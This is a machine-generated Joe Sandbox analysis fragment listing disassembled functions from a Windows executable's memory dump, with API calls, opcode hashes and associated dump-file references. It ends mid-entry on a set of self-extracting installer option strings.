                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: cabbc11ba0514c998065fdd8fca36cf6f1e73836790c18b5a685124bbd1c1be2
                          • Instruction ID: 141baceae5a0908ca7b0ce5f8769f547bdca8f789148eae9375ea43d281c0c24
                          • Opcode Fuzzy Hash: cabbc11ba0514c998065fdd8fca36cf6f1e73836790c18b5a685124bbd1c1be2
                          • Instruction Fuzzy Hash: 9F21C0B1901645AFDB20DFA5D805BAEBBB4EF02730F200329E4246B2C0D7311A04CBA1
                          APIs
                          • ReadFile.KERNELBASE(000000FF,?,?,?,00000000), ref: 001F4BAF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 685d6f9d149374ccdfcfebd5f7286a06b427d5c582cfd3030aee3c587b9c39f3
                          • Instruction ID: 98b346a151bde346d26a043e0e6a32a1e10bd26d99c81e4317502cc6c8038b6d
                          • Opcode Fuzzy Hash: 685d6f9d149374ccdfcfebd5f7286a06b427d5c582cfd3030aee3c587b9c39f3
                          • Instruction Fuzzy Hash: 951136726052059BC718CF18E8A4B7BB7A5FB89350F01092DFA8697291D771EC188B92
                          APIs
                            • Part of subcall function 002248FD: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00222F08,00000001,00000364,?,0022080C,00244590,00000010), ref: 0022493E
                          • _free.LIBCMT ref: 00225DB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: a2b28aaeb0db30afe5244d0a8c66eb16f82873778a16c12e9f2b5d9a3c0c96fc
                          • Instruction ID: 28b5ac2c78dbd9f50e8a1deb6131b2d2d65f45fd5ce430bdb8d72db34b53995e
                          • Opcode Fuzzy Hash: a2b28aaeb0db30afe5244d0a8c66eb16f82873778a16c12e9f2b5d9a3c0c96fc
                          • Instruction Fuzzy Hash: FB0149766107157BE331CFA9E845A9AFBE9EBC5370F25061DE58483280EA30A815CB34
                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00222F08,00000001,00000364,?,0022080C,00244590,00000010), ref: 0022493E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: aff4a9dbe4573b48bf4795b6f6d552781a8e6e1fe0783e844f15f910660c2268
                          • Instruction ID: c3b2d09c66071ffb6f3397383b0a3d0b0aaeea92aba6604929d283e061b353f4
                          • Opcode Fuzzy Hash: aff4a9dbe4573b48bf4795b6f6d552781a8e6e1fe0783e844f15f910660c2268
                          • Instruction Fuzzy Hash: 5AF0B43162413576DB217EE1BC05B5B379CAF527B0B148111EC0D9B191CA70DCB096A0
                          APIs
                          • RegCreateKeyExW.KERNELBASE(80000001,?,00000000,002397B8,00000000,000F003F,00000000,?,?), ref: 001E52AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 1d6feb4927e4ca158043d16bfed90dea16c79be2491c14778031340727cf0b22
                          • Instruction ID: 95da967f2da9f587b5793d5492f92c7866d884724c7802aefa0de5cff22dd490
                          • Opcode Fuzzy Hash: 1d6feb4927e4ca158043d16bfed90dea16c79be2491c14778031340727cf0b22
                          • Instruction Fuzzy Hash: 68F09672110604FFDB1C8F55C809EFB77A9EB51715F10421CB9425A081DBB0ED44C770
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,0021B1C1,?,?,001E1D09,00000018,1FE05385,?,0022E43A,000000FF), ref: 002231F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: bf3a831cfddca7335f0cedf72be2379125fceed3eaa148f39b82d0084f2e45e3
                          • Instruction ID: f302d98405cce2c2c03ef9beb640a0d088bc6da6f5851714d2aff88cb54ee0be
                          • Opcode Fuzzy Hash: bf3a831cfddca7335f0cedf72be2379125fceed3eaa148f39b82d0084f2e45e3
                          • Instruction Fuzzy Hash: 25E0E521230236B6D720AAE5BC05B6B36889B427F0F100111EC0DD20A5CEA9CE3086A1
                          APIs
                          • PostMessageW.USER32(?,0000046B,00000000,00000000), ref: 001EA673
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 6ea8074fe0f31d6b26e107e5dd15d63f3af84749b6bc89c9e1a44089bbd91982
                          • Instruction ID: 4783e7c7f8557f4b6299641c86aee551680cbcc65ce48c33e7da45cc1259d160
                          • Opcode Fuzzy Hash: 6ea8074fe0f31d6b26e107e5dd15d63f3af84749b6bc89c9e1a44089bbd91982
                          • Instruction Fuzzy Hash: 8CE02632112B607BD2B126A2AD01FB7BBDCBF09B11F440409FA82A6DD0C350F8009BA4
                          APIs
                          • PostMessageW.USER32(00000000,00000466,?,?), ref: 001E6EF6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 6554bcfea02d47f918b0c86ceaa30203d7d28a539c0abdd7376286bb3804261b
                          • Instruction ID: a53e6ffc52d2ac687bd4de4f47c1493f6ba603a78c5a5a0ae90c95982d828ea9
                          • Opcode Fuzzy Hash: 6554bcfea02d47f918b0c86ceaa30203d7d28a539c0abdd7376286bb3804261b
                          • Instruction Fuzzy Hash: C5E086320505256FE7615E96EC4AEEB77E8EB14750F044029BA81880B1E7B69894D794
                          APIs
                          • SendMessageW.USER32(00000000,00000467,?,00000000), ref: 001E7156
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 2ae7aaab50d0b065d9b65dac6ccd1b783b7e660ac33ebd40a264e98b41783245
                          • Instruction ID: 8c595169cc2a1ec6198827a571347dbb35e0df5ec3cf90f36ecc693489b4b65a
                          • Opcode Fuzzy Hash: 2ae7aaab50d0b065d9b65dac6ccd1b783b7e660ac33ebd40a264e98b41783245
                          • Instruction Fuzzy Hash: C6E02B32054726AFF3305F5AEC05FAA77E49B00710F044419BB819C0F1D7B6D494D754
                          APIs
                          • PostMessageW.USER32(00000000,00000465,?,?), ref: 001E6EB8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 6a0d55c913a0b48e01217ef2716fc7847c8db5567101694254aa5634f00e671a
                          • Instruction ID: 5ae67f4105b45b85c01d8fbbf7985e1972bdc1a5b528dd8bcbcbc9f712df6212
                          • Opcode Fuzzy Hash: 6a0d55c913a0b48e01217ef2716fc7847c8db5567101694254aa5634f00e671a
                          • Instruction Fuzzy Hash: 52E0C232050529AFE7215E9AEC09E9A77E8AB14760F008019BB82880F0D776D498DB94
                          APIs
                          • PostMessageW.USER32(00000000,00000466,?,?), ref: 001E6EF6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: b74578955a452029d281cd99c6623fb8b1e7ae663ef41135d9c20163d30f9ed4
                          • Instruction ID: 92aefecbe546e3d91d77fd7c3e6af40b1a1379e92a828df900386714a754c6ac
                          • Opcode Fuzzy Hash: b74578955a452029d281cd99c6623fb8b1e7ae663ef41135d9c20163d30f9ed4
                          • Instruction Fuzzy Hash: 50E0C23205052AAFE7216E9AEC05E9B7BE8AB14760F008029BB81880F0D776D4D8DB94
                          APIs
                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0021294C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: deeccf06e4e2bd9ce832b274c3ecf6ed5d364f4e0fb28a2398d7f1ef30c30613
                          • Instruction ID: b1982d357cad0dd9cc1a6cbf81abb580a63c40ef42541d3a8d1039ac6d1853e6
                          • Opcode Fuzzy Hash: deeccf06e4e2bd9ce832b274c3ecf6ed5d364f4e0fb28a2398d7f1ef30c30613
                          • Instruction Fuzzy Hash: F0E0B675511700CBC7388F2CD88865673E8AF0A331B210F6AF066C76E0D770E8998BA8
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: H_prolog3_catch
                          • String ID:
                          • API String ID: 3886170330-0
                          • Opcode ID: 3bf709c08dacb86c4fe27038e91a1e35bf5077416be9525577ca3ff649627d61
                          • Instruction ID: 942115d423b180d9411ec2c1f3c05024ae09d0d388ff4264f90136234bc67275
                          • Opcode Fuzzy Hash: 3bf709c08dacb86c4fe27038e91a1e35bf5077416be9525577ca3ff649627d61
                          • Instruction Fuzzy Hash: 96D09272024259FADF02AFD0DE01BAD3A21BB14310F128850B610190A2CBB285B0BF22
                          APIs
                          • FreeLibrary.KERNELBASE(?,001E6A36,00000000,00239840,00000000,00000000,?,?,?,?), ref: 001E526D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 3553ea836a0fe1e391a1b055d16b15d997168373c15a7b96ee4fbc8f202ae94b
                          • Instruction ID: d5a66c3801bf03cf8cb36040b6ee5202fb2349c69a6817409694d949d6a2684e
                          • Opcode Fuzzy Hash: 3553ea836a0fe1e391a1b055d16b15d997168373c15a7b96ee4fbc8f202ae94b
                          • Instruction Fuzzy Hash: DBB01130800A00CBCF8E8F22FA2C3083A32BB0030EF3088E8A000080B28332CA23CF00
                          APIs
                            • Part of subcall function 00204043: __Init_thread_footer.LIBCMT ref: 0020407E
                          • VirtualAlloc.KERNELBASE(00000000,00020000,00001000,00000004,00000000,?,00219423), ref: 0021A068
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: AllocInit_thread_footerVirtual
                          • String ID:
                          • API String ID: 518651690-0
                          • Opcode ID: e1873cbaafdb8544c7f5717861c706acd8014f3c3903fc9a66b363d4bda1e03e
                          • Instruction ID: 196f95535e32f5428d21c1ed2b31148c8d4cb69144752c5299ff6a7e2cd420ad
                          • Opcode Fuzzy Hash: e1873cbaafdb8544c7f5717861c706acd8014f3c3903fc9a66b363d4bda1e03e
                          • Instruction Fuzzy Hash: CC21C4B0021B408BC330EF2AD99558ABBE4BF14B04BA05D2EE5CB56A51CBB0F559CF94
                          APIs
                          • EnterCriticalSection.KERNEL32(?), ref: 002195CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CriticalEnterSection
                          • String ID:
                          • API String ID: 1904992153-0
                          • Opcode ID: c8795ca4790933b4c91c337b34747b2afebd1300b9bda6466f32c3a4c6fef991
                          • Instruction ID: 63d3d461a569ca19ed3e063d23eeaa254116a280cc201a4497da4dc8e639633c
                          • Opcode Fuzzy Hash: c8795ca4790933b4c91c337b34747b2afebd1300b9bda6466f32c3a4c6fef991
                          • Instruction Fuzzy Hash: 5A014B75200606AFCB1A9F15CC16BAE3BE6FF95310F104065F802972A0EF71DD91DAA1
                          APIs
                          • VirtualFree.KERNELBASE(?,00000000,00008000,00213E2A,?,?,00213DBC,?,002028D0), ref: 002132C0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: 278d11428c4ac206fa34c1358c6fda827b6db971ee42416cbae5ebb906cd4cfc
                          • Instruction ID: b5f1f8c0189565c2f974ee76d7ea9fb638dad4c5f7a1a511d6b234e6a3cf90c0
                          • Opcode Fuzzy Hash: 278d11428c4ac206fa34c1358c6fda827b6db971ee42416cbae5ebb906cd4cfc
                          • Instruction Fuzzy Hash: F2B092B0B4430567EA30DE619E49F0762986B60B50F1484147A88E50C0CA70E810DA28
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: $Delete$DeleteSelf$License$Overwrite$Path$PreExtract$Presetup$Registry$SavePath$Setup$Shortcut$Silent$TempMode$Text$Title$Update$Windows Registry Editor Version 5.00
                          • API String ID: 176396367-287488893
                          • Opcode ID: 2556b9e1b7bf7b5d15956e0f6937d6efc19780a902f330f6759539d63a3f52f1
                          • Instruction ID: 5a0a0edcfc359c6fba9ec1fc1379aac152324a99257fa5f0ef62e4bb757ff3d2
